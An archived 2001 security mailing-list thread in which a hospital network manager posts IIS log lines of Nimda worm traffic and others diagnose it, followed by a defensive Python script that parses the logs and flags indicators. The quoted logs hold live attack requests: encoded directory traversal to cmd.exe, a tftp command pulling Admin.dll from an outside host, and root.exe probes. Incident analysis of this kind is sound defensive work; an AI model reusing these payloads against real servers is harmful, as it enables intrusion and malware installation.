Yes, I am 206.98.124.52. The ADMIN.DLL file was deleted and the directories the event viewer is referencing do not exist on my system. I have followed all instructions for removal from various postings from CRIME. No files referenced in the postings are on my system. Do any of you know how I might stop this attack?

-Mike

dldean@private (dldean) wrote:

This is 206.98.124.52 receiving get requests for the admin.dll from 206.98.79.246 and directory requests for his machine from 206.252.224.50 & 208.238.181.162.

Doug

> -----Original Message-----
> From: owner-crime@/var/spool/majordomo/lists/crime
> [mailto:owner-crime@/var/spool/majordomo/lists/crime]On Behalf Of Kuo, Jimmy
> Sent: Friday, September 21, 2001 2:06 PM
> Cc: crime@private
> Subject: RE: [RE: Any leads?]
>
>
> Oh, I didn't notice the followup questions you asked the first time.
>
> I don't know about the structure of your logs. But are you 206.98.124.52?
>
> Could someone who reads IIS logs say if this is him sending or receiving GETs?
>
> And this is definitely Nimda. I just don't know if you're the target or the culprit. If you haven't upgraded, I'm tempted to believe you're infected and attacking others. The TFTP command shows up only on or after infection. And ADMIN.DLL (Nimda is admin spelt backwards) is also something that shows up after infection. But then you say you don't have it...
>
> Jimmy
>
> > -----Original Message-----
> > From: J.Michael Cuciti [SMTP:mcuciti@private]
> > Sent: Friday, September 21, 2001 1:44 PM
> > To: Kuo Jimmy; Crispin Cowan; Jimmy Sadri
> > Cc: crime@private
> > Subject: Re: [RE: Any leads?]
> >
> > All:
> >
> > I still have a script trying to run, but the location and folder doesn't exist. This is what I found in my log file:
> >
> > 206.98.79.246, -, 9/18/01, 7:29:26, W3SVC, WWW, 206.98.124.52, 150, 151, 304, 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20c:\Admin.dll,
> >
> > 206.98.79.246, -, 9/18/01, 7:29:27, W3SVC, WWW, 206.98.124.52, 180, 151, 304, 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20d:\Admin.dll,
> >
> > 206.252.224.50, -, 9/18/01, 7:29:33, W3SVC, WWW, 206.98.124.52, 10, 72, 273, 403, 5, GET, /scripts/root.exe, /c+dir,
> >
> > 206.252.224.50, -, 9/18/01, 7:29:38, W3SVC, WWW, 206.98.124.52, 80, 96, 1652, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> >
> > 208.238.181.162, -, 9/18/01, 7:29:46, W3SVC, WWW, 206.98.124.52, 10, 97, 243, 500, 123, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir,
> >
> > If anybody knows what this is, please 'spain it to me.
> >
> > I am running IIS 3.0, NT4.0 w/sp3 (haven't upgraded, I inherited this, not my fault :-) )
> >
> > In the event log I see this same type of message running every few minutes. The script is supposedly running from \winnt\iisadmin\Scripts\..%5c..\admin.dll. This does not exist.
> >
> > Thanks...
> >
> > Mike Cuciti
> > Network Service and Support Manager
> > Tuality Healthcare
> > 681.1749
> >
> >
> > "Kuo, Jimmy" <Jimmy_Kuo@private> wrote:
> > >The Melissa author was caught because he posted the infectious document
> > >from his own AOL account to a news group, rather than releasing it
> > >through a hacked account. His guilt was confirmed when the serial number
> > >in the document matched the PC in the dumpster outside his bedroom :-)
> >
> > No. He used a hacked acct. But we identified the exact time of the use of the acct (newsgroup posting message ID) and the FBI traced the phone records.
> >
> > And the PC was destroyed and never located.
> >
> > Where did you get your version of the story?
> >
> > >But Code Red and its derivatives is not an Office document, and
> > >therefore has no serial numbers. That investigators appear to have no
> > >leads months after Code Red appeared tells me that it was likely
> > >released to the wild from a compromised machine, or perhaps
> > >simultaneously released from multiple compromised machines. If the
> > >author(s) were good, then those compromised machines were initially
> > >attacked from other compromised machines. Likely all of these initial
> > >release vector machines have long since been wiped and re-installed, and
> > >the links to the author(s) have been cut.
> >
> > We have some "first instances" of traffic. I don't know what the FBI's doing with the information gathered so far. But I agree that it's difficult and not likely.
> >
> > Jimmy
>
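Jimmy's question ("is this him sending or receiving GETs?") can be answered mechanically from the log format. The following is an added example, not code from anyone on the thread: it parses the five IIS lines quoted above using the field order of the Microsoft IIS log format (client IP is the first field, the server's own IP the seventh), flags the indicators the thread itself names (encoded `..` traversal in the request path, `cmd.exe`/`root.exe` under `/scripts`, a `tftp` pull and `Admin.dll` in the parameters), and counts how often a given address appears as requester versus server. The regex names and the `Finding` type are this example's own; the `Á` in the third traversal variant is matched literally as it appears in the archive.

```python
import re
from dataclasses import dataclass

# Field order of the Microsoft IIS log format (IIS 3.0/4.0).
FIELDS = ["client_ip", "user", "date", "time", "service", "server_name",
          "server_ip", "time_taken", "client_bytes", "server_bytes",
          "status", "win32_status", "method", "target", "params"]

# Sample input: the five log lines quoted in the thread, each rejoined onto
# one line (the archive wrapped two of them).
SAMPLE_LOG = r"""
206.98.79.246, -, 9/18/01, 7:29:26, W3SVC, WWW, 206.98.124.52, 150, 151, 304, 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20c:\Admin.dll,
206.98.79.246, -, 9/18/01, 7:29:27, W3SVC, WWW, 206.98.124.52, 180, 151, 304, 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20d:\Admin.dll,
206.252.224.50, -, 9/18/01, 7:29:33, W3SVC, WWW, 206.98.124.52, 10, 72, 273, 403, 5, GET, /scripts/root.exe, /c+dir,
206.252.224.50, -, 9/18/01, 7:29:38, W3SVC, WWW, 206.98.124.52, 80, 96, 1652, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
208.238.181.162, -, 9/18/01, 7:29:46, W3SVC, WWW, 206.98.124.52, 10, 97, 243, 500, 123, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir,
"""

# Indicators taken from the quoted lines. "Á" is how the archive rendered a
# non-ASCII byte in the third traversal variant; it is matched literally.
TRAVERSAL = re.compile(r"/\.\.(?:%2f|%5c|Á)\.\./", re.IGNORECASE)
EXEC_TARGET = re.compile(r"/(?:cmd\.exe|root\.exe)$", re.IGNORECASE)
TFTP_PULL = re.compile(r"tftp", re.IGNORECASE)


@dataclass
class Finding:
    client_ip: str
    server_ip: str
    status: str
    target: str
    reasons: list


def parse_line(line):
    """Split one Microsoft-IIS-format line into a dict; None if malformed."""
    parts = [p.strip() for p in line.rstrip(",").split(",")]
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def inspect(rec):
    """Return the list of indicator descriptions that apply to one record."""
    reasons = []
    if TRAVERSAL.search(rec["target"]):
        reasons.append("encoded ../ traversal in target")
    if EXEC_TARGET.search(rec["target"]):
        reasons.append("command interpreter requested via /scripts")
    if TFTP_PULL.search(rec["params"]):
        reasons.append("tftp in parameters (file pulled from client)")
    if "admin.dll" in rec["params"].lower():
        reasons.append("Admin.dll named in parameters")
    if reasons and rec["status"] == "200":
        reasons.append("server answered 200, so the request was not rejected")
    return reasons


def scan(log_text):
    """Parse every line and keep those carrying at least one indicator."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # blank or malformed line
        reasons = inspect(rec)
        if reasons:
            findings.append(Finding(rec["client_ip"], rec["server_ip"],
                                    rec["status"], rec["target"], reasons))
    return findings


def role_of(ip, findings):
    """How often `ip` is the requesting client versus the logged server."""
    return {
        "as_client": sum(1 for f in findings if f.client_ip == ip),
        "as_server": sum(1 for f in findings if f.server_ip == ip),
    }


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for f in hits:
        print(f"{f.client_ip} -> {f.server_ip} [{f.status}] {f.target}: "
              + "; ".join(f.reasons))
    print(role_of("206.98.124.52", hits))
```

On the quoted lines every record is flagged, and 206.98.124.52 appears only in the server-IP field, never as the client: this host is receiving the requests. The two lines answered with 200 carry a `tftp ... GET Admin.dll` parameter, which is the transfer Jimmy describes; a 403 or 500 on the `dir` probes means those particular requests were refused or failed.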
This archive was generated by hypermail 2b30 : Sun May 26 2002 - 11:25:46 PDT